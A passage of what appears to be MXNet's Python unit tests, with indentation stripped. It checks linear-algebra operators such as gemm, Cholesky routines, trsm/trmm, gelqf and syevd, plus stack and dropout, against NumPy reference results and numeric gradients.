# Check all transpositions of gemm operator.
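# linalg.gemm computes alpha * dot(op(A), op(B)) + beta * C, where op() is an optional
# transpose controlled by transpose_a / transpose_b; the checks below mirror that with NumPy.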
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check with a different axis indexing the matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from the other linear-algebra operators.
@with_seed()
def test_gemm():
_gemm_test_helper(np.float64, True)
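# The environment variable below presumably controls whether float32 GEMMs may fall back to
# TensorCore (reduced-precision) math on GPU, which is why the run with it enabled uses
# slightly looser tolerances.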
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
_gemm_test_helper(np.float32, False, rtol_fw = 1e-5, atol_fw = 1e-7)
if default_context().device_type == 'gpu':
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "1"
_gemm_test_helper(np.float32, False, rtol_fw = 2e-5, atol_fw = 2e-7)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
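# For m = 3 the mask built below is [[1,0,0],[1,1,0],[1,1,1]], i.e. the identity plus the
# first and second sub-diagonals -- the same as np.tril(np.ones((m, m))).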
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@with_seed()
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
shape = (4, 4, 1, 1)
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: the input has to be symmetrized for the gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw(test_potrf, [data_in], [res_potrf])
if grad_check == 1:
check_grad(test_potrf, [data_in])
# test potri
ones = mx.nd.ones(shape).asnumpy()
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw(test_potri, [data_in], [res_potri])
if grad_check == 1:
check_grad(test_potri, [data_in])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw(test_trsm, [trian_in, data_in], [ones])
if grad_check == 1:
check_grad(test_trsm, [trian_in,data_in])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw(test_trmm, [trian_in, data_in], [ones])
if grad_check == 1:
check_grad(test_trmm, [trian_in, data_in])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw(test_sumlogdiag, [data_in], [res_sumlogdiag])
if grad_check == 1:
check_grad(test_sumlogdiag, [data_in])
# more elaborate example of Cholesky factorization
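# Here matrix = dot(trian, trian.T), i.e. trian is its lower Cholesky factor, inv is the
# inverse of matrix, and the diagonal of pow has log-sum log(2*4*8*16) = 10*log(2), which
# the sumlogdiag check at the end relies on.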
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
low_trian = trian
if not lower:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw(test_potrf, [a], [r])
if grad_check == 1:
check_grad(test_potrf, [a])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw(test_potri, [a], [r])
if grad_check == 1:
check_grad(test_potri, [a])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
a = rep_3x(trian, 4, 4)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw(test_trsm, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm, [a, b])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw(test_trsm2, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm2, [a, b])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw(test_trsm3, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm3, [a, b])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw(test_trsm4, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm4, [a, b])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = rep_3x(trian, 4, 4)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw(test_trmm, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm, [a, b])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw(test_trmm2, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm2, [a, b])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw(test_trmm3, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm3, [a, b])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw(test_trmm4, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm4, [a, b])
# test sumlogdiag
a = rep_3x(pow, 4, 4)
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw(test_sumlogdiag, [a], [r])
if grad_check == 1:
check_grad(test_sumlogdiag, [a])
# Tests for operators linalg.syrk, linalg.gelqf
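# gelqf computes the LQ factorization A = L * Q with Q having orthonormal rows, so the
# combined symbol below should return (dot(Q, Q.T), dot(L, Q)) == (I, A).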
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break for dtype=np.float64: the
# backward gradient for the unused output is then computed in np.float32.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
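# syevd follows the convention that the rows of U are the eigenvectors, i.e.
# A = dot(U.T, dot(diag(lam), U)); for a symmetric input A the combined symbol above should
# therefore return (I, A).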
@with_seed()
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as these tests need CUDA 8,
# while the MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
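# Reference adjoint of syevd: with G = dot(grad_u, u.T), form M with M[i,i] = grad_l[i] and
# M[i,j] = (G[i,j] - G[j,i]) / (2 * (l[i] - l[j])) for i != j, then return dot(u.T, dot(M, u)).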
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs CUDA 8,
# while the MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
@with_seed()
def test_laop_4():
# Currently disabled on GPU as syevd needs CUDA 8,
# while the MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
@with_seed()
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
@with_seed()
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure the input contains no zeros (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# The relative error between output and input sums should stay within ratio/2
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
check_dropout_ratio(0.5, shape, cudnn_off=False)
check_dropout_ratio(0.0, shape, cudnn_off=False)
check_dropout_ratio(1.0, shape, cudnn_off=False)
check_dropout_ratio(0.75, shape, cudnn_off=False)
check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
check_passthrough(0.5, shape, cudnn_off=False)
check_passthrough(0.0, shape, cudnn_off=False)
check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
@with_seed()
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
